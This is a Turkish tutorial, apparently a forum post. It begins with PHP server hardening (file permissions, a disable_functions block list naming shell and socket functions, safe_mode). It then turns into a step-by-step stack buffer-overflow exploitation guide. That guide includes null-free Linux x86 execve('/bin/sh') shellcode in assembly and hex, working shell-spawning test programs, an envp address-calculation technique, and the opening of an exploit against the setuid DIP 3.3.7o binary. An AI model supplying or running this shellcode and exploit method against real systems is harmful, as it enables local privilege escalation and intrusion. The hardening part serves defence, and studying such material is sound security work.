"php.ini" yapılandırmasına geçmeden önce sunucumuzda bulunan klasör ve dosya izinlerini "chmod" doğru şekilde ayarlayalım. Genelde FTP programlarında dosya yada klasör üzerine "sağ click" yapılıp yada "file" seçeneğinden "Change Attributes ya da Properties / CHMOD" seçeneklerinden düzenleriz burada "permissions" altında yani izinler altında önerilenleri girmek en uygunudur.
Klasörler için: 755
Dosyalar için: 644
İzinleri bu şekilde ayarlamanız güvenlik için ilk adımı atmanıza yardımcı olur.
"php.ini" yapılandırması:
Eğer server admini iseniz yani root yetkilere sahipseniz bu ayarları serverda bulunan tüm siteler için yapabilirsiniz genellikle "/usr/local/Zend/etc/" , "/usr/local/lib/" altında bulunur "php.ini" dosyasını açarak düzenleyebilirsiniz veya "httpd.conf" dosyasının doğru yapılandırılmasıyla da olur. Daha sonra apache’ye restart atmanız gerekmektedir.
Root değilseniz sadece kendi siteniz için yapmanız gerekiyorsa kök dizininizde (public_html) bir "php.ini" dosyası oluşturarak veya varolan "php.ini" dosyasının içerisine altta verdiğim kodları ekleyerek güvenliğinizi sağlayabilirsiniz. Fakat sitenizle aynı serverda bulunan diğer sitelerden kaynaklanan açıklardan yararlanan kişiler root olmayı başarırlarsa burada anlatılanlar yetersiz kalır, root olmayı başaramazlarsa ve sitenizin şifrelerini kaptırmazsanız güvendesinizdir.
Altta anlattığım bilgiler iyi bir güvenlik için yapılması gerekenler olduğundan dolayı bunları uyguladıktan sonra bazı scriptlerinizin çalışması engellenmiş olabilir. Ama scriptin çalışmasını engelleyen değerleri iptal ederseniz script tekrar doğru şekilde çalışacaktır.
Şimdi gelelim "php.ini" yapılandırmasına:
"disable_functions" (Güvenlik)
"disable_functions" ile serverınızda birçok fonksiyonun çalışmasını engelleyebilirsiniz bu sayede sitenize inject edilen scriptler, sheller için güvenliğinizi almış olursunuz. Bu kadar fonksiyon fazla gelebilir ama iyi bir güvenlik için şart. Bu kadar sayıda devre dışı bırakılan fonksiyonlar ilk defa "*bir hainin sitesi*" adresinde verilmiştir.
Önerilen:
1-
disable_functions = foreach, glob, openbasedir, posix_getpwuid, f_open, system,dl, array_compare, array_user_key_compare, passthru, cat, exec, popen, proc_close, proc_get_status, proc_nice, proc_open, escapeshellcmd, escapeshellarg, show_source, posix_mkfifo, ini_restore, mysql_list_dbs, get_current_user, getmyuid, pconnect, link, symlink, fin, passthruexec, fileread, shell_exec, pcntl_exec, ini_alter, parse_ini_file, leak, apache_child_terminate, chown, posix_kill, posix_setpgid, posix_setsid, posix_setuid, proc_terminate, syslog, allow_url_fopen, fpassthru, execute, shell, curl_exec, chgrp, stream_select, passthru, socket_select, socket_create, socket_create_listen, socket_create_pair, socket_listen, socket_accept, socket_bind, socket_strerror, pcntl_fork, pcntl_signal, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, openlog, apache_get_modules, apache_get_version, apache_getenv, apache_note, apache_setenv, virtual
Eğer bu kadar fonsiyonu devre dışı bırakmak fazla geldiyse alttaki gibi de ayarlayabilirsiniz bu da güvenliğiniz için yeterlidir:
2-
disable_functions = glob, posix_getpwuid, array_compare, array_user_key_compare, ini_restore, exec, proc_get_status, proc_nice, proc_open, allow_url_fopen, fin, pconnect, system, dl, passthruexec, shell_exec, proc_close, proc_get_status, chown, chgrp, escapeshellcmd, escapeshellarg, fileread, passthru, popen,curl_exec, shell, execute
"safe_mode" (Güvenlik)
"Safe Mode" adından da anlaşılacağı gibi "Güvenli Mod" anlamına geliyor. "Safe Mode" genelde birçok serverda "Off" durumdadır ve bu da birçok tehlikeye davetiye çıkaran unsurlar arasında yer alır. "Güvenli Modu Açık" durumuna getirmek shellerin serverımızda istedikleri gibi dolaşmalarını, exploitlerin çalıştırılmasını ve komutların execute edilmelerini önler. Günümüzde "açık olan güvenlik modunu" kapalı duruma getiren scriptler mevcut fakat altta anlatılan önlemlerle bunun da önüne geçilebilir.
Önerilen:
safe_mode = on
Not: Serveriniz de bazı scriptler de hatalar alabilirsiniz.Fakat serverin genel anlamda güvenliğini sağlamış olursunuz.Server da Root yetkisi alamayan hiçkimse sunucuya kolay kolay zarar veremeyecektir.
Buffer overflow Security
Buffer overfl0w Security
Bir degiskeni saklayabilecegi yerden daha fazla bilgiyle doldurmaya calisirsaniz karsiniza windows’larda gpf, *nix’de segmentation fault olarak cikan olay. input olarak girilen bilginin esp stack pointer’ina tekabul eden yerine yine bu inputtaki uygun memory adresi getirilirse makine uzerinde istenilen kodu icra ettirilebilir ki bu hackerlarin en cok basvurduklari yontemdir. bu makine kodu sistemde genellikle bir backdoor acmak icin yazilir, cogu zaman shell code olarak bilinir.Milw0rm,SecurityFocus gibi sitelerde shellc0de bölümlerinde bulunan exploitlerdir.metasploit yazılımıyla derlenip backdoor açmak içinde kullanılırlar.
C dili dizi referansları üzerinde sınır kontrolü yapmıyor ve yerel değişkenler yığıt(stack) üzerinde o anki durum bilgisini oluşturan dönüş adresi ve frame göstericisiyle birlikte tutuluyor. Bu iki durumun birleşmesi yanlış ellerde ciddi hataların oluşmasına sebep olabilir. Öncelikle kütüphane fonksiyonu olan gets() nasıl çalışıyor bir göstermemiz gerekiyor.
Quote: AKINCILAR
char *gets(char *s){
int c;
char *dest = s;
while ((c = getchar()) != ’\\\\\\\\n’ && c != EOF)
*dest++ = c;
*dest++ = ’\\\\\\\\0’; /* Terminate String */
if (c == EOF)
return NULL;
return s; }
Görüldüğü üzere gets fonksiyonu ’\\\\\\\\n’ (yeni satır) veya EOF görene kadar standart inputtan girdiyi alarak s ile gösterilen yere girdiyi kopyalar, sonuna da "null" karakterini koyar. Bu sırada hiç bir sınır kontrolü yapmıyor. Şimdi gets() fonksiyonunu çağıran bergi fonksiyonunu inceleyelim.
Quote: AKINCILAR
void bergi() {
char buf[4];
printf(“3 karakterden uzun bir string girmeyiniz:)”);
gets(buf);
puts(buf); }
Bufferımız 4’lük olduğu için en fazla 4 karakter girebiliriz gibi görünüyor en başta. Ancak gets’in sona eklediği null karakterini de hesaba katarsak en fazla 3 karakter girebiliriz. Peki 3 karakterden fazla karakter girersek ne olacak? İşte bu durumu incelememiz gerekiyor. Yukardan aşağıya doğru adresin azaldığını düşünelim. Öncelikle kullanıcıdan alınan girdinin “123” olduğu durumu değerlendirelim. Yığıtın o anki durumu aşağıdaki gibi olacaktır. (1den 9 a kadar olan sayılar için ascii tablosunda verilen onaltılık tabandaki değerler 0x31 ile 0x39 arasındadır.)
Eğer girdi “1234567” olursa buffer 1234 ile dolacak , frame göstericisi ise 567 ve null karakterleriyle dolacaktır ve yığıt şu halde olacaktır.
Yani buf[4] ’ten buf[7] ’ ye kadar olan tüm yazmalar frame göstericisinin (pointerının) değerini değiştirecektir. bergi fonksiyonun işi bittiğinde ve çağrıldığı fonksiyona dönülmek istendiğinde frame göstericisinin değerleri değiştiği için (az bir ihtimal kullanıcı frame göstericisi %ebp’nin değeri ile aynı değeri verecek karakterleri girseydi sorun olmayacaktı), yanlış bir çerçeve içinde bergi fonksiyonu kaldığı yerden çalışmaya devam edecekti ve fonksiyon içinde kullanılan tüm referanslar geçersiz olacaktı.
Son olarak da “123456789” girildiğini düşünelim. Bu durumda yığıttaki buffer, %ebp ve dönüş adres kısımları ekrandan girilen girdiyle dolacak ve değerleri değişecekti. Yanlış bir çerçeveye geçilecek ve dönüş adresi de değiştiği için bergi fonksiyonunu çağıran fonksiyonda kalındığı yerden devam edilemeyecekti. Yüksek olasılıkla segmentation fault hatası alınacaktı.
Boylece buffer doldu tasti, geri donus adresi de dahil olmak uzere hafizanin
bir kismini ’A’ harfi ile doldurdu. Bu programi derleyip calistirirsak,
"Segmentation fault (core dumped)" hatasi aliriz. Bu hatanin sebebi
genellikle programin kendine ait bellek kismi disindaki kisimlara erismeye
calismasidir. Core dosyasini, programin crash ettigi andaki hafiza
fotografi olarak dusunebiliriz.
gdb ile olusan core dosyasini incelersek:
[evil@victim evil]$ gdb -q ./e ./core
Core was generated by `./e’
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb)
Gordugunuz gibi, RET instruction’i EIP register’ina ’AAAA’ ya karsilik gelen
0x41414141 adresini PUSH ettigi icin, bu adresteki instruction’a islemci
tarafindan erisilmeye calisilmis. Fakat bu adres prosesin erisim yetkisi
disinda oldugu icin isletim sistemi SIGSEGV signaliyla programin calismasina
son vermis.
fonksiyon’u cagirdigimizda Stack’in gorunumu soyledir:
| *str | EBP+8
|geri donus adresi| EBP+4
| saklanmis ESP | EBP ESP
| foo1 | EBP-4
| foo1 | EBP-8
| foo1 | EBP-12
| foo1 | EBP-16
Biz strcpy()’yi cagirdigimizda buyuk_array, foo1 array’inin baslangic adresi
olan EBP-16’dan baslayarak, yukari dogru butun stack’i A ile dolduruyor.
Simdi, peki, geri donus adresinin uzerine yazabildik, o zaman o adrese
calismasini istedigimiz baska bir program parcaciginin adresini koysak,
fonksiyon geri dondugunde o program parcaciginin adresine gidip, ordaki
instruction’lari calistirmaya baslamaz mi?
Cevap: Evet baslar. Mesela biz buraya /bin/sh calistiran bir kodun adresini
koysak, fonksiyon geri dondukten sonra /bin/sh calistiracak olan kod
calismaya baslayacak ve biz shell’e dusecegiz.
Pointer aritmetigi ile, geri donus adresinin degerini degistiebildigimizi
soyle ufak bir ornekte anlatmaya calisalim:
void fonksiyon(int a, int b, int c)
{
char foo[6];
int *ret;
ret = foo + 12;
(*ret) += 8;
}
void main()
{
int x;
x = 0;
fonksiyon(1, 2, 3);
x = 1;
printf("%d\\\\\\\\n", x);
}
Yukaridaki kodu calistirisaniz, x degerinin 1 olarak degil 0 olarak
basildigini goreceksiniz. Burada yaptigimiz sey, geri donus adresinin degeri
ile oynayarak, x = 1; komutunu pas gecmek oldu.
Yukaridaki kodda daha once de anlattigimiz gibi, fonksiyon cagrilmadan once,
bir sonraki instruction’un yani "x = 1"e denk gelen instruction’in adresi
geri donus adresi olarak stack’e PUSH ediliyor. Fonksiyon cagrildiktan sonra
stack’in gorunumunu sembolize edecek olursak:
| a | EBP+16
| b | EBP+12
| c | EBP+8
|geri donus adresi| EBP+4
| saklanmis ESP | EBP ESP
| foo | EBP-4
| foo | EBP-8
fonksiyon icinde bir integer’a pointer olan *ret, in adresini, foo’nun adresi
+ 12 olarak belirledik. Yukaridaki sekle bakarsaniz, foo’nun
adresi(ESP-8)’e 12 eklerseniz geri donus adresinin basina gelmis oluruz.
(*ret) += 8 yaparak da, o bolmede saklanmakta olan geri donus adresinin
degerini 8 aritiriyoruz. Neden mi? Kodumuzun assembler dump’ina bakalim:
0x804849d : pushl $0x3
0x804849f : pushl $0x2
0x80484a1 : pushl $0x1
0x80484a3 : call 0x8048470
0x80484a8 : addl $0xc,%esp
0x80484ab : movl $0x1,0xfffffffc(%ebp)
0x80484b2 : movl 0xfffffffc(%ebp),%eax
0x80484b5 : pushl %eax
0x80484b6 : pushl $0x804851c
0x80484bb : call 0x80483bc
0x80484c0 : addl $0x8,%esp
0x80484c3 : leave
0x80484c4 : ret
daki fonksiyon’a CALL yapilmadan once ne yapiliyordu? Bir sonraki
instruction’un adresi stack’a push ediliyordu. Yani stack’e diger
instruction’un adresi olarak (x = 1’in) 0x80484ab adresi PUSH edilecek. Fakat
biz burdaki instruction’u gecmek ve de direkt olarak 0x80484b2 adresinden
devam etmek istiyoruz. Aradaki fark da 0x80484b2 - 0x80484ab = 0x8.
Yani 8 byte’lik bir fark var. O zaman, stack’a PUSH edilen geri donus
adresini degerini 8 artirirsak, x = 1 islemini bypass etmis olacagiz. Iste
bu nedenle 8 byte artiriyoruz: (*ret) += 8;.
Evet, eger retun adresin degeri ile oynayip, onu istedigimiz bir hafiza
bolmesine yonlendirebiliyorsak, o zaman, hafizada shell spawn eden bir
instruction’lar dizisi bulundurur, geri donus adresini de bu instruction’lar
dizisinin baslangic adresi olarak degistiririz, ve voila, direk olarak
shell’e duseriz!!!
Peki o zaman, shell spawn etmek icin ne yapmali? En basitinden C’de soyle
olacaktir:
#include
void main()
{
char *shell[2];
shell[0] = "/bin/sh";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
execve(2)’yi okursaniz, execve system call’u calistirilacak dosya ismine
pointer, arguman pointer’i ve de NULL da olabilen bir environment pointer’i
aliyor. Bu kodu derleyip calistirirsaniz:
[MnmL@victim MnmL]$ ./s
bash$
baska bir shell spawn etmis olursunuz...
Fakat biz "shell spawn eden programimizi" boyle cagiramayiz, oyle degil mi?
O zaman bunu makinanin direkt calistirabilecegi instruction’lar dizisi haline
getirmek lazim. Yukaridaki kodumuzu gcc’ye --static parametresi vererek
derleyip, assembler ciktisina bakalim:
[MnmL@victim MnmL]$ gcc --static -o s s.c
[MnmL@victim MnmL]$ gdb ./s
(gdb) disas main
Dump of assembler code for function main:
0x8048124 : pushl %ebp
0x8048125 : movl %esp,%ebp
0x8048127 : subl $0x8,%esp
0x804812a : movl $0x80592ac,0xfffffff8(%ebp)
0x8048131 : movl $0x0,0xfffffffc(%ebp)
0x8048138 : pushl $0x0
0x804813a : leal 0xfffffff8(%ebp),%eax
0x804813d : pushl %eax
0x804813e : movl 0xfffffff8(%ebp),%eax
0x8048141 : pushl %eax
0x8048142 : call 0x804ca10
0x8048147 : addl $0xc,%esp
0x804814a : leave
0x804814b : ret
0x804814c : nop
0x804814d : nop
0x804814e : nop
0x804814f : nop
End of assembler dump.
(gdb)
Yukarida kisaca, ve de procedure prologue goruluyor,
-- char *shell icin gerekli 8 byte stack pointer’dan cikiliyor,
-- "/bin/sh" string’inin adresi EBP - 8’e yani shell[0]’a konuyor
- 0x0 yani NULL EBP - 4’e konuyor
simdi de sirasiyla argumanlar bir sonraki fonksiyon (execve) icin stack’a
PUSH ediliyor...
- 0x0 (shell[1]) PUSH ediliyor
- shell[0]’daki "/bin/sh" in adresi EAX registirina konuyor
- EAX stack’a push ediliyor, (dolayisiyla shell[0]in icindeki
efektiv adres)
- shell[0] in adresi EAX’a kopyalaniyor,
- EAX gene PUSH ediliyor
- execve() cagriliyor...
Simdi de execve’nin assembler dump’ina bakalim:
(gdb) disas __execve
Dump of assembler code for function __execve:
0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
0x80002c0 <__execve+4>: movl $0xb,%eax
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
0x80002ce <__execve+18>: int $0x80
0x80002d0 <__execve+20>: movl %eax,%edx
0x80002d2 <__execve+22>: testl %edx,%edx
0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42>
0x80002d6 <__execve+26>: negl %edx
0x80002d8 <__execve+28>: pushl %edx
0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location>
0x80002de <__execve+34>: popl %edx
0x80002df <__execve+35>: movl %edx,(%eax)
0x80002e1 <__execve+37>: movl $0xffffffff,%eax
0x80002e6 <__execve+42>: popl %ebx
0x80002e7 <__execve+43>: movl %ebp,%esp
0x80002e9 <__execve+45>: popl %ebp
0x80002ea <__execve+46>: ret
0x80002eb <__execve+47>: nop
End of assembler dump.
Ilk uc satir, procedure prologue:
0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
0x80002bf <__execve+3>: pushl %ebx
Syscall table’daki execve’nin numarasi olan 11’i EAX’a kopyaliyoruz.
(farkli system call calistirmak isteyebilirsiniz, system call’un numarasini
/usr/src/linux/include/asm/unistd.h dosyasindan ogrenebilirsiniz. Farkli
system call’lari kullanan daha egzotik shellcode’lari sonraki dokumanlarda
bulabileceksiniz)
0x80002c0 <__execve+4>: movl $0xb,%eax
"/bin/sh" in adresini EBX’e kopyaliyoruz:
0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
shell[]’in adresini ECX’e kopyaliyoruz:
0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
NULL pointer’in adresini EDX’e kopyaliyoruz:
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
ve, kernel mod’a geciyoruz:
0x80002ce <__execve+18>: int $0x80
Simdi de, exit() icin gerekli assebmly kodlari:
(gdb) disas _exit
Dump of assembler code for function _exit:
0x800034c <_exit>: pushl %ebp
0x800034d <_exit+1>: movl %esp,%ebp
0x800034f <_exit+3>: pushl %ebx
0x8000350 <_exit+4>: movl $0x1,%eax
0x8000355 <_exit+9>: movl 0x8(%ebp),%ebx
0x8000358 <_exit+12>: int $0x80
0x800035a <_exit+14>: movl 0xfffffffc(%ebp),%ebx
0x800035d <_exit+17>: movl %ebp,%esp
0x800035f <_exit+19>: popl %ebp
0x8000360 <_exit+20>: ret
0x8000361 <_exit+21>: nop
0x8000362 <_exit+22>: nop
0x8000363 <_exit+23>: nop
End of assembler dump.
Yukadida da, ozet olarak, EAX register’i syscall table’da exit’in karsiligi
olan 1 yapilip, EBX’de 0 yapilip kernel mode’a geciliyor.
Evet yukaridakileri soyle bir ozetlersek, yaptigimiz sey, stack’a shell[0],
shell ve NULL PUSH edip execve’yi cagirmakti. Sonra execve "/bin/sh"i
calistirdi. Yalniz dikkat ediniz, execve’nin icinde yapilan isler tamamen
Linux-specific’tir. Linux, kernel moduna gecmeden once gerekli olan seyleri
register’lara koyar ve sonra da kernel moduna gecer, eger isletim sistemimiz
FreeBSD olsa idi, execve bu parametreleri gene stack’a koyacakti...
execve’nin calismasi icin gereken sartlar:
1. Hafizanin bir yerinde "/bin/sh" stringini bulundurmak,
2. "/bin/sh" in adresini ve arkasindan bir adet null long word bulundurmak
3. system call table’da execve’yi tanimlayan 0xb (11) degerini EAX registerina
koymak
4. "/bin/sh" in adresinin adresini EBX registerina koymak
5. shell’in adresini ECX registerina koymak
6. null long word’un adresini EDX registerina koymak,
7. 0x80 ile kernel moda gecmek.
Iste bu kadar, yalniz execve’de bir sorun oldugunda programin smooth exit
yapabilmesi icin bir de buna exit() system call’unu eklemeliyiz, ama bu
zorunlu degil. Bunu yapmayip shellcode’unuzu kisaltabilirsiniz.
exit() calistiran bir programi assembler koduna baktiginiz zaman, exit
syscall’unun da kernel moda gecmeden evvel, EAX registerina 0x1 (1) ve
de, EBX registerina 0x0 (0) istedigini goreceksiniz.
O zaman 7. den sonra 8, 9 ve 10. adimlarimizi da yazalim:
8. system call table’da exit’in karsiligi olan 0x1’i EAX’a koy
9. EBX’e 0x0 koy
10 0x80 ile kernel moduna gec.
Evet, kisaca boyle. Bu isleri yapan bir shell code yazip, objdump’la
hex karsiligini bulabiliriz:
void main() {
__asm__("
jmp 0x2a # 3 byte
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 byte
movb $0x0,0x7(%esi) # 4 byte
movl $0x0,0xc(%esi) # 7 byte
movl $0xb,%eax # 5 byte
movl %esi,%ebx # 2 byte
leal 0x8(%esi),%ecx # 3 byte
leal 0xc(%esi),%edx # 3 byte
int $0x80 # 2 byte
movl $0x1, %eax # 5 byte
movl $0x0, %ebx # 5 byte
int $0x80 # 2 byte
call -0x2f # 5 byte
.string \\\\\\\\"/bin/sh\\\\\\\\" # 8 byte
");
}
Bu programi derleyip objdump’la sadece main’in icerigine bakalim:
[mnml@victim mnml]$ make q
cc q.c -o q
[mnml@victim mnml]$ objdump -d q | grep \\\\\\\\: -A23 | more
08048440 :
8048440: 55 pushl %ebp
8048441: 89 e5 movl %esp,%ebp
8048443: eb 2a jmp 804846f
8048445: 5e popl %esi
8048446: 89 76 08 movl %esi,0x8(%esi)
8048449: c6 46 07 00 movb $0x0,0x7(%esi)
804844d: c7 46 0c 00 00 movl $0x0,0xc(%esi)
8048452: 00 00
8048454: b8 0b 00 00 00 movl $0xb,%eax
8048459: 89 f3 movl %esi,%ebx
804845b: 8d 4e 08 leal 0x8(%esi),%ecx
804845e: 8d 56 0c leal 0xc(%esi),%edx
8048461: cd 80 int $0x80
8048463: b8 01 00 00 00 movl $0x1,%eax
8048468: bb 00 00 00 00 movl $0x0,%ebx
804846d: cd 80 int $0x80
804846f: e8 d1 ff ff ff call 8048445
8048474: 2f das
8048475: 62 69 6e boundl 0x6e(%ecx),%ebp
8048478: 2f das
8048479: 73 68 jae 80484e3 <_etext+0x33>
804847b: 00 c9 addb %cl,%cl
804847d: c3 ret
Gordugunuz gibi bize gerekli instruction’lar 0x8048443’ten itibaren basliyor.
Dikkat ederseniz, instruction’lar arasinda ornegin movl $0xb,%eax’a denk
gelen 0 iceren bir kac byte vardir. Sorun su ki, strcpy() ve arkadaslari
0 byte’i string’in sonu olarak algiliyor, yani bu haliyle bizim shellcode
sadece ilk 0 byte’a kadar kopyalanacak. 0’lara denk gelen instruction’lari
bunlarin dengi fakat 0 icermeyen instruction’larla degistirip tekrar
deneyelim. Asagida, hangi instruction’lari hangileriyle degistirdigimiz
yeraliyor:
movb $0x0,0x7(%esi) xorl %eax,%eax
molv $0x0,0xc(%esi) movb %eax,0x7(%esi)
movl %eax,0xc(%esi)
--------------------------------------------------------
movl $0xb,%eax movb $0xb,%al
--------------------------------------------------------
movl $0x1, %eax xorl %ebx,%ebx
movl $0x0, %ebx movl %ebx,%eax
inc %eax
Ve yeni shellcode’umuz:
void main() {
__asm__("
jmp 0x1f # 2 byte
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 byte
xorl %eax,%eax # 2 byte
movb %eax,0x7(%esi) # 3 byte
movl %eax,0xc(%esi) # 3 byte
movb $0xb,%al # 2 byte
movl %esi,%ebx # 2 byte
leal 0x8(%esi),%ecx # 3 byte
leal 0xc(%esi),%edx # 3 byte
int $0x80 # 2 byte
xorl %ebx,%ebx # 2 byte
movl %ebx,%eax # 2 byte
inc %eax # 1 byte
int $0x80 # 2 byte
call -0x24 # 5 byte
.string \\\\\\\\"/bin/sh\\\\\\\\" # 8 byte
# toplam 46 byte
");
}
[mnml@victim mnml]$ make q
cc q.c -o q
[mnml@victim mnml]$ objdump -d q | grep \\\\\\\\: -A23
08048440 :
8048440: 55 pushl %ebp
8048441: 89 e5 movl %esp,%ebp
8048443: eb 1f jmp 8048464
8048445: 5e popl %esi
8048446: 89 76 08 movl %esi,0x8(%esi)
8048449: 31 c0 xorl %eax,%eax
804844b: 88 46 07 movb %al,0x7(%esi)
804844e: 89 46 0c movl %eax,0xc(%esi)
8048451: b0 0b movb $0xb,%al
8048453: 89 f3 movl %esi,%ebx
8048455: 8d 4e 08 leal 0x8(%esi),%ecx
8048458: 8d 56 0c leal 0xc(%esi),%edx
804845b: cd 80 int $0x80
804845d: 31 db xorl %ebx,%ebx
804845f: 89 d8 movl %ebx,%eax
8048461: 40 incl %eax
8048462: cd 80 int $0x80
8048464: e8 dc ff ff ff call 8048445
8048469: 2f das
804846a: 62 69 6e boundl 0x6e(%ecx),%ebp
804846d: 2f das
804846e: 73 68 jae 80484d8 <_fini+0x28>
8048470: 00 c9 addb %cl,%cl
Shell kodumuzu deneyelim:
char shellcode[] =
"\\\\\\\\xeb\\\\\\\\x1f\\\\\\\\x5e\\\\\\\\x89\\\\\\\\x76\\\\\\\\x08\\\\\\\\x31\\\\\\\\xc0\\\\\\\\x88\\\\\\\\x46\\\\\\\\x07\\\\\\\\x89\\\\\\\\x46\\\\\\\\x0c\\\\\\\\xb0\\\\\\\\x0b"
"\\\\\\\\x89\\\\\\\\xf3\\\\\\\\x8d\\\\\\\\x4e\\\\\\\\x08\\\\\\\\x8d\\\\\\\\x56\\\\\\\\x0c\\\\\\\\xcd\\\\\\\\x80\\\\\\\\x31\\\\\\\\xdb\\\\\\\\x89\\\\\\\\xd8\\\\\\\\x40\\\\\\\\xcd"
"\\\\\\\\x80\\\\\\\\xe8\\\\\\\\xdc\\\\\\\\xff\\\\\\\\xff\\\\\\\\xff/bin/sh";
void main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = shellcode;
}
[mnml@victim mnml]$ make shellcode
cc shellcode.c -o shellcode
[mnml@victim mnml]$ ./shellcode
bash$
Iste calisti!
Yaptigimiz sey, main() icindeki pointer to integer olan ret degiskeninin
adresini 2 birim (8 byte) artirarak geri donus adresinin oldugu yere gitmek,
sonra da o bolume shellcode’umuzun adresini saklamakti. main RET yaptiginda
geri donus adresi yerine shell kodumuzun adresini POP edildi, ve islemci
bu adresteki instruction’lari calistirdi...
-- Exploit Yazma --
Simdi kendimiz bir buffer overflow hatasi olan bir kod yazip, ondan shell
calistiralim:
victim.c:
char shellcode[] =
"\\\\\\\\xeb\\\\\\\\x1f\\\\\\\\x5e\\\\\\\\x89\\\\\\\\x76\\\\\\\\x08\\\\\\\\x31\\\\\\\\xc0\\\\\\\\x88\\\\\\\\x46\\\\\\\\x07\\\\\\\\x89\\\\\\\\x46\\\\\\\\x0c\\\\\\\\xb0\\\\\\\\x0b"
"\\\\\\\\x89\\\\\\\\xf3\\\\\\\\x8d\\\\\\\\x4e\\\\\\\\x08\\\\\\\\x8d\\\\\\\\x56\\\\\\\\x0c\\\\\\\\xcd\\\\\\\\x80\\\\\\\\x31\\\\\\\\xdb\\\\\\\\x89\\\\\\\\xd8\\\\\\\\x40\\\\\\\\xcd"
"\\\\\\\\x80\\\\\\\\xe8\\\\\\\\xdc\\\\\\\\xff\\\\\\\\xff\\\\\\\\xff/bin/sh";
char large_str[50];
void main()
{
int i;
char foo[12];
int *ap = (int *)large_str;
for (i = 0; i < 50; i += 4)
*ap++ = shellcode;
strcpy(foo, large_str);
}
[mnml@victim mnml]$ make victim
cc victim.c -o victim
[mnml@victim mnml]$ ./victim
bash$
Voila! Iste bu kadar. Peki ne yaptik? for dongusunde, large_str array’ine
shellcode’umuz olan shellcode’nin adresini kopyaladik. Adres 32 bit - 4 byte
oldugu icin, i degiskenini 4’er artiriyoruz. Daha sonra, main()’in icindeki
12 bytelik array’e, shellcode’umuzun adresini barindiran 50 bytelik bir array
kopyalayinca (strcpy()), geri donus adresinin uzerine large_str’nin icerigi --
bizim shellcode’un adresi -- yazildi. Ve dolayisiyla main() cagrilmadan
once save edilen geri donus adresi, shell kodumuzun adresi ile override
edildi. Boylece main()’deki RET shellcode’un adresini POP ediyor ve islemci
o adresteki instruction’lari calistirip bize shell prompt veriyor. Burda
karistirilmamasi gereken bir nokta, strcpy()’nin kendi buffer’ini degil,
main()’in buffer’ini overflow etmesi. Yani strcpy() CALL edilirken, ondan
sonraki instruction’in adresi strcpy() RET ettikten sonra da eskisi gibi
duruyor. strcpy()’nin overwrite ettigi main()’in local degiskeni olan foo.
Evet, simdi burada kendi programimizin buffer’ini overflow ettik,
shellcode’umuzun adresin biliyorduk. Peki baska bir programin buffer’ini
overflow ederken napicaz? Shellkodumuzun hafizanin neresinde olacagini
nereden bilecegiz? Guzel bi soru.
Iki cevabi var:
1. Aleph1’in paper’inda yazdigi gibi, aslinda bilemeyiz, isletim sistemi o
kodu bi yerlere atar, biz de shell kod’un offset’ini tahmin edebiliriz. Ama
bu su anda cok "lame" kabul edilen bir yontem.
2. Akillilik edip, shell kodun adresini biz kendimiz belirleyebiliriz.
Nasil mi?
Linux ELF binary’si hafizaya yuklendigindeki hafiza haritasinin en yuksek
adresine gdb ile detayli gozatarsak sunu goruruz:
--------------------- 0xBFFFFFFF
|\\\\\\\\000 \\\\\\\\000 \\\\\\\\000 \\\\\\\\000| 0xBFFFFFFB (4 tane NUL byte)
|\\\\\\\\000 ...... | 0xBFFFFFFA (program_ismi)
| ..................|
|...................| 1. environment degiskeni (env[0])
|...................| 2. environment degiskeni (env[1])
|...................| 3. ...
|...................| ...
|...................| 1. argument string’i (argv[0])
|...................| 2. argument string’i (argv[1])
|...................| 3. ...
| . |
| . |
| . |
Daha once execve() nin son parametresinin environment degiskenlerini tutan
bir string’ler array’i oldugunu soylemistik. Buraya kadar guzel, yukaridaki
sekle bakarsaniz, biz, 1. enviroment degiskeninin *baslangic* adresini kesin
olarak hesapliyabiliriz.
envp = 0xBFFFFFFF -
4 - (4 tane NUL byte)
strlen(program_ismi) - (program isminin son NUL’i icermeyen boyutu)
1 - (yukarida strlen()’in saymadigi NUL)
strlen(envp[0]) (ilk environment degiskenin boyutu)
Daha da basitlestirirsek:
envp = 0xBFFFFFFA - strlen(program_ismi) - strlen(env[0])
O zaman envp[0]’a shellcode’umuzu koyup, envp’yi execve’ye environment
degiskenlerini barindiran array of strings parametresi olarak verebiliriz.
Boylece shellcode’umuzun adresini kesin bildigimize gore, overflow
edecegimiz buffer’i hangi adresle doldurmamiz gerektigini biliyoruz:
ret = 0xBFFFFFFA - strlen(program_ismi) - strlen(shellcode);
Buffer overflow ne demek biliyoruz, bufferi nasil overflow edecegimizi
biliyoruz, return adresi nasil modifiye edebilecegimizi biliyoruz,
shellcode’umuzun adresini de biliyoruz, sorun kalmadi, simdi ilk gercek
exploit’umuzu yazabiliriz:
- The Exploit -
DIP (Dial Up IP protocol) programinin 3.3.7o-uri (8 Feb 96) versiyonunda,
bir buffer overflow hatasi vardi. Bu program bazi Linux dagitimlarinda
by-default setuid olarak geliyordu. Programin aldigi parametrelerden -l
switch’i, programin icinde manipulate edilirken stpcpy() fonksiyonu ile
bounds checking yapilmadan kopyalaniyordu. Dolayisiyla burada bir buffer
overflow olusuyordu.
DIP’in bu versiyonunda hatali olan kod asagidaki gibiydi:
command.c dosyasinda, asagidaki gibi bi operasyon var:
l = stpcpy(l, argv);
Man stpcpy deyip bakarsaniz stpcpy fonksiyonu buffer’in sinirlari hakkinda
hicbir kontrol uygulamadan kendisine verilen string’i digerine oylece
kopyaliyor. Iste burada yapacagimiz sey de bu buffera shell kodumuzun
adresini ’dikkatlice’ yerlestirmek.
[mnml@victim mnml]$ /usr/sbin/dip -k -l `perl -e ’print "A"x116’`
